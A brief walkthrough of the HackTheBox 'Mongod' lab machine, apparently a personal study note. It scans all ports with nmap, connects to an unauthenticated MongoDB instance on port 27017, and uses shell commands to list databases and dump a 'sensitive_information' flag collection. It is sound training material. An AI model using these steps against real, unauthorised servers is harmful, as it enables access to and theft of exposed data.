Walkthrough - A HackTheBox machine - Mongod

Enumerate open services/ports:

nmap -sC -sV $ip -Pn -p-

Ports 22 and 27017 are open.

mongo IP:port
# in my case: mongo 10.129.228.30:27017 

Now, use mongodb cheat sheet to browse the databases:

show databases
use sensitive_information
show collections
db.flag.find()

Last update: 2023-05-08
Created: May 8, 2023 17:15:13